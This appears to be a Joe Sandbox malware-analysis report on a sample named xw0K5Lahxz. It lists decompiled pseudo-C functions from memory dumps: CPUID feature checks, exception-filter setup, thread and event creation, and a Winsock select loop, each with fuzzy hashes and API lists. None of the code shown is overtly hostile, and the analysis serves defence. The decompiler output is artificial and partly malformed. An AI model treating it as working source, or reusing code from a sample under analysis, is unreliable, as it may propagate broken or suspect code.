Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ad64bec91f0250d9cf219d016ca73146c541a1bd9b14052a58fc59414354e3c0
Instruction ID: e57eb46037187a7e4eb7190ced692256c2eb96e640d2e0f141c26e0c507c0e57
Opcode Fuzzy Hash: ad64bec91f0250d9cf219d016ca73146c541a1bd9b14052a58fc59414354e3c0
Instruction Fuzzy Hash: E1310675D01218DBDB10DFA5D989BCDBBB8BF08705F1040EAE40DAB250EB759B848F49

Uniqueness

Uniqueness Score: -1.00%

Function 00413645 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00413645(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x41e540 =  *0x41e540 & 0x00000000;
				 *0x41b020 =  *0x41b020 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x41e544; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x41e544 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x41b020; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x41e540 = 1;
					 *0x41b020 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x41e540 = 2;
						 *0x41b020 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x41b020; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x41e540 = 3;
								 *0x41b020 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x41e540 = 5;
									 *0x41b020 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x41b020 =  *0x41b020 | 0x00000040;
										 *0x41e540 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x41e544; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x41e544 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00413645
0x00413648
0x00413652
0x00413663
0x00413812
0x00413815
0x00413815
0x00413669
0x0041366f
0x00413674
0x00413678
0x0041367c
0x0041367d
0x0041367f
0x00413682
0x00413687
0x00413690
0x004136a1
0x004136ac
0x004136b2
0x004136b3
0x004136b8
0x004136bb
0x004136c0
0x004136c8
0x004136cb
0x004136ce
0x00413713
0x00413713
0x00413719
0x00413719
0x0041371e
0x0041371f
0x00413725
0x00413756
0x00413727
0x00413729
0x0041372a
0x0041372f
0x00413732
0x00413734
0x00413737
0x0041373a
0x0041373d
0x00413740
0x00413749
0x0041374e
0x0041374e
0x00413749
0x00413759
0x0041375e
0x00413761
0x0041376b
0x00413776
0x0041377c
0x0041377f
0x00413789
0x00413794
0x004137a0
0x004137a3
0x004137a6
0x004137b1
0x004137b6
0x004137b8
0x004137bd
0x004137c0
0x004137ca
0x004137d2
0x004137d7
0x004137e1
0x004137ef
0x00413802
0x00413809
0x00413809
0x004137ef
0x004137d2
0x004137b6
0x00413794
0x00000000
0x00413811
0x004136d3
0x004136dd
0x00413702
0x00413708
0x0041370b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041365B

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7c6e49b1333284f92ad155b49227cb8ebbaeeb65e0b3afe07bd393469276de82
Instruction ID: 0905a7d0bed091d94e47d98c6490a50aa8db6ab4a9ae08bad31b10ff203d1805
Opcode Fuzzy Hash: 7c6e49b1333284f92ad155b49227cb8ebbaeeb65e0b3afe07bd393469276de82
Instruction Fuzzy Hash: FE519FB2D002158FDB24CF95D8857EABBF1FB48315F24C46AD815EB390E3789A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041355C Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041355C() {

				return SetUnhandledExceptionFilter(E00413568);
			}

0x00413567

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00013568,0041313B), ref: 00413561

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c28b9b41aa6c41c13867236e8d6be0344ad3bc7f1b722f475854220886370bdc
Instruction ID: 8c403ccf88a9fb134dca85a1ed230d60e21a706dffa022715b15a7bdf0a97f84
Opcode Fuzzy Hash: c28b9b41aa6c41c13867236e8d6be0344ad3bc7f1b722f475854220886370bdc
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00721FA3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp, Offset: 00721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_721000_xw0K5Lahxz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c8b03ce27c929f3f705d1bcac81238ac52ff4312c09b53c90ace838f5f96d743
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: FF118E72340110AFE754DF55EC81EA673EAFB99320B298165ED08CB356D679EC02C760

Uniqueness

Uniqueness Score: -1.00%

Function 004012B0 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E004012B0() {
				intOrPtr _v8;
				char _v16;
				signed int _t8;
				intOrPtr _t12;
				signed int _t14;
				signed int _t18;

				_push(0xffffffff);
				_push(E00414D36);
				_push( *[fs:0x0]);
				_t8 =  *0x41b014; // 0x149e0abf
				_push(_t8 ^ _t18);
				 *[fs:0x0] =  &_v16;
				_t14 =  *0x41e218; // 0x0
				_v8 = 0;
				_t12 =  *0x41e1c4; // 0x80000001
				if(_t12 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4))) {
					_t12 = E00412B64(_t12, 0x41e1c4);
					_t23 =  *0x41e1c4 - 0xffffffff;
					if( *0x41e1c4 == 0xffffffff) {
						 *0x41b004 = 0x4153f0;
						E00412FBB(_t23, 0x414f30);
						_t12 = E00412B1A(0x41e1c4);
					}
				}
				 *0x41e1a0 = 0x41b004;
				 *[fs:0x0] = _v16;
				return _t12;
			}

0x004012b3
0x004012b5
0x004012c0
0x004012c1
0x004012c8
0x004012cc
0x004012d8
0x004012de
0x004012e8
0x004012f3
0x004012fa
0x00401302
0x00401309
0x00401310
0x0040131a
0x00401324
0x00401329
0x00401309
0x0040132c
0x00401339
0x00401344

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID:
API String ID: 2013694253-0
Opcode ID: 5b0ac810a596d5bb39f72256f6af38fb04541eea79e48da622fb2eabcd08df42
Instruction ID: c4f3a4bd02e9dc3df5a1ec5a4a7d959254ac718ed0d4c717384b82ff208e7cf4
Opcode Fuzzy Hash: 5b0ac810a596d5bb39f72256f6af38fb04541eea79e48da622fb2eabcd08df42
Instruction Fuzzy Hash: 9601DFB4944A44EFC320EF16EA41BCAB7A0E308714F10827BEC15937D0D7796840CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401350 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401350() {
				intOrPtr _v8;
				char _v16;
				signed int _t8;
				intOrPtr _t12;
				signed int _t14;
				signed int _t18;

				_push(0xffffffff);
				_push(E00414D36);
				_push( *[fs:0x0]);
				_t8 =  *0x41b014; // 0x149e0abf
				_push(_t8 ^ _t18);
				 *[fs:0x0] =  &_v16;
				_t14 =  *0x41e218; // 0x0
				_v8 = 0;
				_t12 =  *0x41e1c0; // 0x80000002
				if(_t12 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4))) {
					_t12 = E00412B64(_t12, 0x41e1c0);
					_t23 =  *0x41e1c0 - 0xffffffff;
					if( *0x41e1c0 == 0xffffffff) {
						 *0x41b000 = 0x41540c;
						E00412FBB(_t23, 0x414f40);
						_t12 = E00412B1A(0x41e1c0);
					}
				}
				 *0x41e19c = 0x41b000;
				 *[fs:0x0] = _v16;
				return _t12;
			}

0x00401353
0x00401355
0x00401360
0x00401361
0x00401368
0x0040136c
0x00401378
0x0040137e
0x00401388
0x00401393
0x0040139a
0x004013a2
0x004013a9
0x004013b0
0x004013ba
0x004013c4
0x004013c9
0x004013a9
0x004013cc
0x004013d9
0x004013e4

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID:
API String ID: 2013694253-0
Opcode ID: d869fb8b3113f032a32162373442669cfbc84f2cdedaceb42f8e691566a201ec
Instruction ID: 64156fe580411f0a4adaaee51230d1554ea8dce45e71fdcc2de4b8a9e96f710a
Opcode Fuzzy Hash: d869fb8b3113f032a32162373442669cfbc84f2cdedaceb42f8e691566a201ec
Instruction Fuzzy Hash: 4401F274900A44EBC320DF06E941BCAB7A0F309718F10863AEC15D37D0D77D69408B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004013F0 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E004013F0() {
				intOrPtr _v8;
				char _v16;
				signed int _t8;
				intOrPtr _t12;
				signed int _t14;
				signed int _t18;

				_push(0xffffffff);
				_push(E00414D36);
				_push( *[fs:0x0]);
				_t8 =  *0x41b014; // 0x149e0abf
				_push(_t8 ^ _t18);
				 *[fs:0x0] =  &_v16;
				_t14 =  *0x41e218; // 0x0
				_v8 = 0;
				_t12 =  *0x41e1c4; // 0x80000001
				if(_t12 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4))) {
					_t12 = E00412B64(_t12, 0x41e1c4);
					_t23 =  *0x41e1c4 - 0xffffffff;
					if( *0x41e1c4 == 0xffffffff) {
						 *0x41b004 = 0x4153f0;
						E00412FBB(_t23, 0x414f30);
						_t12 = E00412B1A(0x41e1c4);
					}
				}
				 *0x41e190 = 0x41b004;
				 *[fs:0x0] = _v16;
				return _t12;
			}

0x004013f3
0x004013f5
0x00401400
0x00401401
0x00401408
0x0040140c
0x00401418
0x0040141e
0x00401428
0x00401433
0x0040143a
0x00401442
0x00401449
0x00401450
0x0040145a
0x00401464
0x00401469
0x00401449
0x0040146c
0x00401479
0x00401484

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID:
API String ID: 2013694253-0
Opcode ID: df7137817dd667541fe81067c102c610209f46636b20e60c177556e7c1b02972
Instruction ID: 671eb60878d4a428762a332f4be940fe2994c32980629e72abc39b4b85e5afdc
Opcode Fuzzy Hash: df7137817dd667541fe81067c102c610209f46636b20e60c177556e7c1b02972
Instruction Fuzzy Hash: 7701DFB4944A04EBC320DF16EA41BCAB7A0E308718F10827BED15933E0D77968408A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004021C0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 160
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004021C0(long __ecx, void* __edi, intOrPtr* _a4) {
				signed int _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr* _v36;
				struct _SECURITY_ATTRIBUTES* _v48;
				char _v56;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t35;
				void* _t38;
				long _t42;
				void* _t45;
				signed int _t48;
				long _t61;
				long _t65;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				void* _t92;
				void* _t93;
				long _t95;
				long _t96;
				void* _t97;
				void* _t100;
				signed int _t102;
				signed int _t104;

				_t104 = (_t102 & 0xfffffff8) - 0x14;
				_t35 =  *0x41b014; // 0x149e0abf
				_v8 = _t35 ^ _t104;
				_t70 = _a4;
				_push(__edi);
				_t95 = __ecx;
				_v24 = __ecx;
				_t92 = CreateEventW(0, 1, 0, 0);
				 *(_t70 + 4) = _t92;
				if(_t92 != 0) {
					L3:
					_t38 = CreateEventW(0, 1, 0, 0);
					 *(_t95 + 8) = _t38;
					 *(_t70 + 8) = _t38;
					if( *(_t95 + 8) != 0) {
						L6:
						_t39 =  &_v12;
						_v12 = 0;
						__imp___beginthreadex(0, 0,  &M00402320, _t70, 0, _t39);
						_t104 = _t104 + 0x18;
						 *(_t95 + 4) = _t39;
						_t96 = CloseHandle;
						if(_t39 != 0) {
							L12:
							if(_t92 != 0) {
								WaitForSingleObject(_t92, 0xffffffff);
								_t39 = CloseHandle(_t92);
							}
							_pop(_t93);
							_pop(_t97);
							_pop(_t71);
							return E00412A1E(_t39, _t71, _v8 ^ _t104, _t87, _t93, _t97);
						} else {
							_t42 = GetLastError();
							_t87 =  *_t70;
							_v20 = _t42;
							 *((intOrPtr*)( *_t70))(1);
							if(_t92 != 0) {
								CloseHandle(_t92);
							}
							_t45 =  *(_v28 + 8);
							if(_t45 != 0) {
								CloseHandle(_t45);
							}
							_t70 = _v24;
							_v24 = _t70;
							_v20 = E00412970();
							if(_t70 != 0) {
								goto L17;
							} else {
								goto L12;
							}
						}
					} else {
						_t61 = GetLastError();
						_t87 =  *_t70;
						_t96 = _t61;
						 *((intOrPtr*)( *_t70))(1);
						_v24 = _t96;
						_v20 = E00412970();
						if(_t96 != 0) {
							goto L16;
						} else {
							_t95 = _v28;
							goto L6;
						}
					}
				} else {
					_t65 = GetLastError();
					_t87 =  *_t70;
					_t96 = _t65;
					 *((intOrPtr*)( *_t70))(1);
					_v24 = _t96;
					_v20 = E00412970();
					if(_t96 != 0) {
						E00401CE0( &_v24, "thread.entry_event", _t92, _t96);
						L16:
						E00401CE0( &_v24, "thread.exit_event", _t92, _t96);
						L17:
						E00401CE0( &_v24, "thread", _t92, _t96);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t48 =  *0x41b014; // 0x149e0abf
						 *[fs:0x0] =  &_v56;
						_t72 = _v36;
						_v36 = _t72;
						_v48 = 0;
						SetEvent( *(_t72 + 4));
						 *((intOrPtr*)( *_t72 + 4))(_t48 ^ _t104, _t96, _t70,  *[fs:0x0], 0x413bcd, 0xffffffff, _t100);
						 *((intOrPtr*)( *_t72))(1);
						SetEvent( *(_t72 + 8));
						SleepEx(0xffffffff, 1);
						 *[fs:0x0] = _v56;
						return 0;
					} else {
						_t95 = _v28;
						goto L3;
					}
				}
			}

0x004021c6
0x004021c9
0x004021d0
0x004021d5
0x004021d9
0x004021e0
0x004021e4
0x004021ee
0x004021f0
0x004021f5
0x00402220
0x00402228
0x0040222e
0x00402231
0x00402238
0x00402263
0x00402263
0x00402267
0x0040227c
0x00402282
0x00402285
0x00402288
0x00402290
0x004022ce
0x004022d0
0x004022d5
0x004022dc
0x004022dc
0x004022e2
0x004022e3
0x004022e4
0x004022ef
0x00402292
0x00402292
0x00402298
0x0040229e
0x004022a2
0x004022a6
0x004022a9
0x004022a9
0x004022af
0x004022b4
0x004022b7
0x004022b7
0x004022b9
0x004022bd
0x004022c6
0x004022cc
0x00000000
0x00000000
0x00000000
0x00000000
0x004022cc
0x0040223a
0x0040223a
0x00402240
0x00402246
0x00402248
0x0040224a
0x00402253
0x00402259
0x00000000
0x0040225f
0x0040225f
0x00000000
0x0040225f
0x00402259
0x004021f7
0x004021f7
0x004021fd
0x00402203
0x00402205
0x00402207
0x00402210
0x00402216
0x004022fb
0x00402300
0x00402309
0x0040230e
0x00402317
0x0040231c
0x0040231d
0x0040231e
0x0040231f
0x00402333
0x0040233e
0x00402344
0x00402347
0x0040234a
0x00402354
0x0040235e
0x0040236a
0x0040236d
0x00402377
0x00402382
0x0040238f
0x0040221c
0x0040221c
0x00000000
0x0040221c
0x00402216

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004021E8
GetLastError.KERNEL32 ref: 004021F7
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402228
GetLastError.KERNEL32 ref: 0040223A
GetLastError.KERNEL32 ref: 00402292
CloseHandle.KERNEL32(00000000), ref: 004022A9
CloseHandle.KERNEL32(00000000), ref: 004022B7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004022D5
CloseHandle.KERNEL32(00000000), ref: 004022DC
SetEvent.KERNEL32(?,149E0ABF,7620F560,?,00000000,00413BCD,000000FF), ref: 00402354
SetEvent.KERNEL32(?), ref: 0040236D
SleepEx.KERNEL32(000000FF,00000001), ref: 00402377

Strings

thread.exit_event, xrefs: 00402300
thread.entry_event, xrefs: 004022F2
thread, xrefs: 0040230E

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Event$CloseErrorHandleLast$Create$ObjectSingleSleepWait
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 301388165-3017686385
Opcode ID: 3d0f40c442eec171dd21ca8431fadd8ed52ed5c6e4dc474fcfd0d6b242c42512
Instruction ID: 5c2008beb4103128b8a139d7f1b2d9214a88dfd9acc6c9a2d85f9afa000c4e7c
Opcode Fuzzy Hash: 3d0f40c442eec171dd21ca8431fadd8ed52ed5c6e4dc474fcfd0d6b242c42512
Instruction Fuzzy Hash: 2E519D756047009FD710DFA4C989B9ABBA4FB88750F10856EF915AB3D0DBB4A8048B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404020 Relevance: 12.3, APIs: 8, Instructions: 285
networksleepCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00404020(intOrPtr __ecx, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				struct _CRITICAL_SECTION* _v52;
				intOrPtr _v56;
				signed int** _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t117;
				struct _CRITICAL_SECTION* _t120;
				signed int _t125;
				intOrPtr _t133;
				signed int _t139;
				signed int _t147;
				signed int _t148;
				signed int _t157;
				signed int _t167;
				signed int* _t176;
				void* _t181;
				intOrPtr _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				signed int** _t191;
				signed int _t192;
				void* _t193;
				signed int _t195;
				signed int _t197;
				unsigned int _t212;
				unsigned int _t213;
				intOrPtr _t218;
				void* _t219;
				void* _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int** _t223;
				void* _t225;
				signed int* _t226;
				signed int _t227;
				void* _t228;
				intOrPtr* _t230;
				intOrPtr _t231;
				signed int _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t236;

				_push(0xffffffff);
				_push(0x413dbd);
				_push( *[fs:0x0]);
				_t116 =  *0x41b014; // 0x149e0abf
				_t117 = _t116 ^ _t236;
				_v20 = _t117;
				_push(_t117);
				 *[fs:0x0] =  &_v16;
				_t218 = __ecx;
				_v44 = __ecx;
				_v40 = _a8;
				_t120 = __ecx + 0x18;
				_v52 = _t120;
				EnterCriticalSection(_t120);
				_v48 = 1;
				_v8 = 0;
				if( *((char*)(_t218 + 0xd0)) != 0) {
					L37:
					LeaveCriticalSection(_v52);
					 *[fs:0x0] = _v16;
					_pop(_t219);
					_pop(_t225);
					_pop(_t181);
					return E00412A1E(_t120, _t181, _v20 ^ _t236, _t212, _t219, _t225);
				}
				_t191 = _t218 + 0xc0;
				_v60 = _t191;
				 *( *(_t218 + 0xa8)) = 0;
				 *(_t218 + 0xb0) = 0xffffffff;
				 *( *(_t218 + 0xb4)) = 0;
				 *(_t218 + 0xbc) = 0xffffffff;
				 *( *_t191) = 0;
				_t125 = 0;
				_t191[2] = 0xffffffff;
				_t226 =  *(_t218 + 0xa8);
				_t182 =  *((intOrPtr*)(_t218 + 0x30));
				_t192 =  *_t226;
				if(_t192 == 0) {
					L4:
					_t213 =  *(_t218 + 0xac);
					_t192 = _t192 + 1;
					if(_t192 <= _t213) {
						L8:
						 *((intOrPtr*)(_t226 + 4 +  *_t226 * 4)) = _t182;
						 *( *(_t218 + 0xa8)) =  *( *(_t218 + 0xa8)) + 1;
						L9:
						_t227 =  *(_t218 + 0xcc);
						_t183 = 0;
						if(_t227 == 0) {
							L13:
							_v32 = 3;
							_t228 = _t218 + 0xb0;
							_t220 = _t218 + 0x38;
							do {
								_push(_t192);
								_t50 = _t228 - 8; // 0xfffffff7
								_t192 = _t50;
								E00402DE0(_t192, _t220);
								_t183 =  >  ?  *_t228 : _t183;
								_t220 = _t220 + 0x1c;
								_t51 =  &_v32;
								 *_t51 = _v32 - 1;
								_t228 = _t228 + 0xc;
							} while ( *_t51 != 0);
							_t221 = _v44;
							_push(_t192);
							_t193 = _t221 + 0xb4;
							E00402DE0(_t193, _t221 + 0x8c);
							_push(_t193);
							_t184 =  >  ?  *((intOrPtr*)(_t221 + 0xbc)) : _t183;
							E00402DE0(_t221 + 0xc0, _t221 + 0x8c);
							_t133 =  *((intOrPtr*)(_t221 + 0xc8));
							_t195 = 0x11e1a300;
							_t230 =  *((intOrPtr*)(_t221 + 0xcc));
							_t134 =  <=  ? _t184 : _t133;
							_v56 =  <=  ? _t184 : _t133;
							if(_t230 == 0) {
								L18:
								_t139 = (0x431bde83 * _t195 >> 0x20 >> 0x12 >> 0x1f) + (0x431bde83 * _t195 >> 0x20 >> 0x12);
								_v28 = _t139;
								_v24 = _t195 - _t139 * 0xf4240;
								LeaveCriticalSection(_t221 + 0x18);
								E00412970();
								_t231 =  *((intOrPtr*)(_t221 + 0xc0));
								_v32 =  *((intOrPtr*)(_t221 + 0xb4));
								_v36 =  *((intOrPtr*)(_t221 + 0xa8));
								__imp__#112(0);
								_t212 = _v36;
								_t197 = _v32;
								if(_t212 != 0 || _t197 != 0 || _t231 != 0) {
									__eflags = _v28;
									if(_v28 == 0) {
										_t157 = _v24;
										__eflags = _t157;
										if(_t157 > 0) {
											__eflags = _t157 - 0x3e8;
											_v36 = 0x3e8;
											_t158 =  <  ? _v36 : _t157;
											_v24 =  <  ? _v36 : _t157;
										}
									}
									_t147 = _v56 + 1;
									__imp__#18(_t147, _t212, _t197, _t231,  &_v28);
									_t232 = _t147;
									_t148 = E00412970();
									__imp__#111();
									__eflags = _t232;
									if(__eflags >= 0) {
										_t148 = E00412970();
										__eflags = _t232;
									}
									if(__eflags > 0) {
										__imp__#151( *((intOrPtr*)(_t221 + 0x30)),  *((intOrPtr*)(_t221 + 0xa8)));
										__eflags = _t148;
										if(__eflags != 0) {
											E00403BD0(_t221 + 0x30, __eflags);
											_t232 = _t232 - 1;
											__eflags = _t232;
										}
									}
									_t120 = EnterCriticalSection(_t221 + 0x18);
									_v48 = 1;
									__eflags = _t232;
									if(_t232 > 0) {
										E00402EA0(_t221 + 0xc0, _t221 + 0x8c, _v40);
										E00402EA0(_t221 + 0xb4, _t221 + 0x8c, _v40);
										_t185 = _t221 + 0x70;
										_t235 = 2;
										_t223 = _v60;
										do {
											_t120 = E00402EA0(_t223, _t185, _v40);
											_t185 = _t185 - 0x1c;
											_t223 = _t223 - 0xc;
											_t235 = _t235 - 1;
											__eflags = _t235;
										} while (_t235 >= 0);
										_t221 = _v44;
									}
									goto L34;
								} else {
									_t212 = 0x10624dd3 * _v24 >> 0x20 >> 6;
									_t207 =  ==  ? 1 : (_t212 >> 0x1f) + _t212 + _v28 * 0x3e8;
									Sleep( ==  ? 1 : (_t212 >> 0x1f) + _t212 + _v28 * 0x3e8);
									E00412970();
									_t120 = EnterCriticalSection(_t221 + 0x18);
									_v48 = 1;
									L34:
									_t233 =  *((intOrPtr*)(_t221 + 0xcc));
									if(_t233 == 0) {
										goto L37;
									}
									_t222 = _v40;
									do {
										_t120 =  *((intOrPtr*)( *_t233 + 0x10))(_t222);
										_t233 =  *((intOrPtr*)(_t233 + 4));
									} while (_t233 != 0);
									goto L37;
								}
							}
							do {
								_t167 =  *((intOrPtr*)( *_t230 + 0xc))(_t195);
								_t230 =  *((intOrPtr*)(_t230 + 4));
								_t195 = _t167;
							} while (_t230 != 0);
							goto L18;
						} else {
							while(1) {
								_t192 = _t227;
								if( *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))() == 0) {
									goto L13;
								}
								_t227 =  *(_t227 + 4);
								if(_t227 != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t209 =  >=  ? (_t213 >> 1) + _t213 : _t192;
					_v32 =  >=  ? (_t213 >> 1) + _t213 : _t192;
					_t226 = E00412C3A(4 + ( >=  ? (_t213 >> 1) + _t213 : _t192) * 4, _t182, _t218, _t226, 4 + ( >=  ? (_t213 >> 1) + _t213 : _t192) * 4);
					 *_t226 =  *( *(_t218 + 0xa8));
					_t192 = 0;
					_t176 =  *(_t218 + 0xa8);
					if( *_t176 <= 0) {
						L7:
						_push(_t176);
						L00412FD0();
						 *(_t218 + 0xa8) = _t226;
						 *(_t218 + 0xac) = _v32;
						goto L8;
					} else {
						goto L6;
					}
					do {
						L6:
						 *((intOrPtr*)(_t226 + 4 + _t192 * 4)) =  *((intOrPtr*)( *(_t218 + 0xa8) + 4 + _t192 * 4));
						_t192 = _t192 + 1;
						_t176 =  *(_t218 + 0xa8);
					} while (_t192 <  *_t176);
					goto L7;
				}
				while( *((intOrPtr*)(_t226 + 4 + _t125 * 4)) != _t182) {
					_t125 = _t125 + 1;
					if(_t125 < _t192) {
						continue;
					}
					goto L4;
				}
				goto L9;
